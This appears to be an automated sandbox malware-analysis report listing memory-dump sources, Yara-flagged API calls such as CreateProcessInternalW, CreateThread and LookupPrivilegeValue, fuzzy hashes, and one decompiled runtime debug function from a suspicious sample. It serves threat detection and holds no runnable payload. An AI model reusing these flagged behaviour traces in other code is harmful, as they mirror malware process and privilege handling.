                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: bcf7f767c90850c6fe5ea6c3da68c611e1c573b4d3f171c801e1911e4bf518b0
                                                                      • Instruction ID: 944a2c1aad5046b1258b9d1f33841f752d1cf28fc49358ad57ac68086b52b0be
                                                                      • Opcode Fuzzy Hash: bcf7f767c90850c6fe5ea6c3da68c611e1c573b4d3f171c801e1911e4bf518b0
                                                                      • Instruction Fuzzy Hash: 3D9002612C2041527555B15D44045074056BBE0285B91C012A1405951C8566E85AF661
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: ee5ebf659001dea02fd6439480f52a33c7cd615c23c78c4080a6bb69708ca13a
                                                                      • Instruction ID: c18b6c9460213f45d3dec6060d402ea4a7f6520008163c71abee5f9a6bb41351
                                                                      • Opcode Fuzzy Hash: ee5ebf659001dea02fd6439480f52a33c7cd615c23c78c4080a6bb69708ca13a
                                                                      • Instruction Fuzzy Hash: 2890027128100413F121615D45047070059ABD0285F91C412A0415559D9696D956B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e1e0e502e483b66425731212d47ead764ba89ed1247bd4e975f0ce7401b20030
                                                                      • Instruction ID: 80ba37fefee186b7d256868a8cccfb382756e347a9e3656f8c7a662933d18b6a
                                                                      • Opcode Fuzzy Hash: e1e0e502e483b66425731212d47ead764ba89ed1247bd4e975f0ce7401b20030
                                                                      • Instruction Fuzzy Hash: CD9002B128100402F150715D44047460055ABD0345F51C011A5055555E8699DDD976A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 51b3321488ce524d974c0cc7097024d803d19a0d7c69937e557b17ae820e8ec4
                                                                      • Instruction ID: 565f99832bd9ea70efa6e4f4d506080589d61996f2d184742f05790fca5f88f9
                                                                      • Opcode Fuzzy Hash: 51b3321488ce524d974c0cc7097024d803d19a0d7c69937e557b17ae820e8ec4
                                                                      • Instruction Fuzzy Hash: BA9002A13C100442F110615D4414B060055EBE1345F51C015E1055555D8659DC567166
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 37041a17dcbb6dc4bd391086d2be11473516b07633e8acbf854f9d8a81d799df
                                                                      • Instruction ID: 78ab1a61d46c2073896a9cdb97e8d6a87dfd3d22b114ada43edbb28b3602587a
                                                                      • Opcode Fuzzy Hash: 37041a17dcbb6dc4bd391086d2be11473516b07633e8acbf854f9d8a81d799df
                                                                      • Instruction Fuzzy Hash: A990026129180042F210656D4C14B070055ABD0347F51C115A0145555CC955D8657561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 030B6F88
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: 03d41cf3a13b2fb4802584e5cc4aa97dff399ad698c1439f5adf2832003c1629
                                                                      • Instruction ID: c456c24d9289eb79892c62ab45260832bdf4754bfd460eec38e925bc78549ab3
                                                                      • Opcode Fuzzy Hash: 03d41cf3a13b2fb4802584e5cc4aa97dff399ad698c1439f5adf2832003c1629
                                                                      • Instruction Fuzzy Hash: C43160B5602709ABC751DF64C8A1FE7B7F8AB88700F04855DF61A6B240D771B545CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 030B6F88
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: d04be055dc302280fe78d6e4de035a3618d939de21f24231bdd747296999e526
                                                                      • Instruction ID: 43e0a839144e831909aafc09f3b052fc230e9e71977e8ef76d76d700a1c1f118
                                                                      • Opcode Fuzzy Hash: d04be055dc302280fe78d6e4de035a3618d939de21f24231bdd747296999e526
                                                                      • Instruction Fuzzy Hash: E121A2B5602305ABC711DFA4C8A0FEBB7F4EB88710F04856DF6196B280D771A545CBE5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,030A3B93), ref: 030B84FD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction ID: e096c0a896ecc545c184b5c38df20080c7919e418fd5d289897d0872dfb8e2ed
                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction Fuzzy Hash: 4EE01AB52002046BD714DF59CC44EE777ACEF88650F018555F9085B251C630E910CAB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030A72BA
                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030A72DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                      • Instruction ID: 62f627a0f647ba517721e1cb66bfb78e77260042cb47ebbd41a0b22e72b48196
                                                                      • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                      • Instruction Fuzzy Hash: CD01F231A8232876E720E6D89C02FFEB76C9B80F50F144019FF04BE1C1E6A4690683F5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 030A9B92
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                      • Instruction ID: fa453da844e468f34507206eef6d246d3c9f03d7520c687834d56b6bfa863686
                                                                      • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                      • Instruction Fuzzy Hash: 5F011EB9E1120DBBDF10DAE4ED41FDDB7B89B54208F044195AA089B241F631EB14CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030B8594
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: c6dc7d5f12d27e3b612536aea087b6a30286916a5f54c0b4b4e78d866914d871
                                                                      • Instruction ID: 1f2b7d745753b81a73843f97e13a88637a814b2f6d7952dbd0feba6f0b740748
                                                                      • Opcode Fuzzy Hash: c6dc7d5f12d27e3b612536aea087b6a30286916a5f54c0b4b4e78d866914d871
                                                                      • Instruction Fuzzy Hash: 8901AFB2210108AFCB54DF99DC80EEB37ADAF8C364F158658FA1DD7290C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030B8594
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                      • Instruction ID: ec6efd227701b8ad28ba618d465f1698ae2c942cb07d37e72581066ffe64897d
                                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                      • Instruction Fuzzy Hash: B901AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97250C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030ACCD0,?,?), ref: 030B704C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
                                                                      • Instruction ID: 4c28cd87536db122178ca3012a29d09fc12a5eaefede3c5985c5d286eedc52e6
                                                                      • Opcode Fuzzy Hash: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
                                                                      • Instruction Fuzzy Hash: 5FE06D373913043AE330A5999C02FE7B3AC8BD1B20F540026FA0DEB2C0D5A5F80242A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030ACCD0,?,?), ref: 030B704C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: 36d5e91dbe184978dff326045b69fb06519d0e4513c7b9aecefaf6d5be2f606d
                                                                      • Instruction ID: 7be2ed632d63b48439719f2dd69aaad141c81512dbd61ea0b4b588abc30ede38
                                                                      • Opcode Fuzzy Hash: 36d5e91dbe184978dff326045b69fb06519d0e4513c7b9aecefaf6d5be2f606d
                                                                      • Instruction Fuzzy Hash: BDE04F7A39130076E330A6588C02FE7B2A98BD1B10F69041AF649BF2C0D5A5F90246A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,030ACFA2,030ACFA2,?,00000000,?,?), ref: 030B8660
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction ID: 9e3a32184ccf7b339460a85fee2eba4b60f26a89a85176b206e99e9667ae836b
                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction Fuzzy Hash: 23E01AB52002086BDB10DF49CC84EE737ADEF88650F018555FA085B241C930E8108BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(030B3516,?,030B3C8F,030B3C8F,?,030B3516,?,?,?,?,?,00000000,00000000,?), ref: 030B84BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                      • Instruction ID: 7ecfa185e75d4d812f0acf5e60a846eacf87e438e0b4f88b0477a19f5587bb47
                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                      • Instruction Fuzzy Hash: CCE012B6200208ABDB14EF99CC40EE777ACEF88650F118959FA085B241CA30F910CAB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,030A7C63,?), ref: 030AD43B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                      • Instruction ID: 46255f62d8f740e5b48d55c0e2bb9d0a764bedd5d25e73d5186b1b1884653b28
                                                                      • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                      • Instruction Fuzzy Hash: 13D0A7757503043BE710FBE89C03F6672CC5B54A00F494064F949DB3C3D960F4004565
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 80213cf99b5206010d8619c959d3ce2b448b041f5e55e6566a464bf5d2e0a510
                                                                      • Instruction ID: 6007ae5d9c77c1f80409dfe5513195e5697d76bf252eec4112947c2ab634641d
                                                                      • Opcode Fuzzy Hash: 80213cf99b5206010d8619c959d3ce2b448b041f5e55e6566a464bf5d2e0a510
                                                                      • Instruction Fuzzy Hash: 06B09BB19414C5C9F711D7A4560871779507BD0745F16C055D1020645A4778D0D5F6B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      C-Code - Quality: 53%
                                                                      			E0461FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                      				void* _t7;
                                                                      				intOrPtr _t9;
                                                                      				intOrPtr _t10;
                                                                      				intOrPtr* _t12;
                                                                      				intOrPtr* _t13;
                                                                      				intOrPtr _t14;
                                                                      				intOrPtr* _t15;
                                                                      
                                                                      				_t13 = __edx;
                                                                      				_push(_a4);
                                                                      				_t14 =  *[fs:0x18];
                                                                      				_t15 = _t12;
                                                                      				_t7 = E045CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                      				_push(_t13);
                                                                      				E04615720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                      				_t9 =  *_t15;
                                                                      				if(_t9 == 0xffffffff) {
                                                                      					_t10 = 0;
                                                                      				} else {
                                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                      				}
                                                                      				_push(_t10);
                                                                      				_push(_t15);
                                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                      				return E04615720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                      			}










                                                                      0x0461fdda
                                                                      0x0461fde2
                                                                      0x0461fde5
                                                                      0x0461fdec
                                                                      0x0461fdfa
                                                                      0x0461fdff
                                                                      0x0461fe0a
                                                                      0x0461fe0f
                                                                      0x0461fe17
                                                                      0x0461fe1e
                                                                      0x0461fe19
                                                                      0x0461fe19
                                                                      0x0461fe19
                                                                      0x0461fe20
                                                                      0x0461fe21
                                                                      0x0461fe22
                                                                      0x0461fe25
                                                                      0x0461fe40

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0461FDFA
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0461FE01
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0461FE2B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp, Offset: 04560000, based on PE: true
                                                                      • Associated: 00000007.00000002.588375415.000000000467B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000007.00000002.588407066.000000000467F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: 9a66512f1277d997a9e9a0bcfa618b6350156c34b75ca445b8fa90027d905564
                                                                      • Instruction ID: 191b6f7c2ca05b33905a5b93b39a743bb4d16f20ef6e3d90eabb488058e9293e
                                                                      • Opcode Fuzzy Hash: 9a66512f1277d997a9e9a0bcfa618b6350156c34b75ca445b8fa90027d905564
                                                                      • Instruction Fuzzy Hash: 8DF0F632200201BFE6251A55DC02F23BF6BEB84730F180318F628561E1EA62F860E6F4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%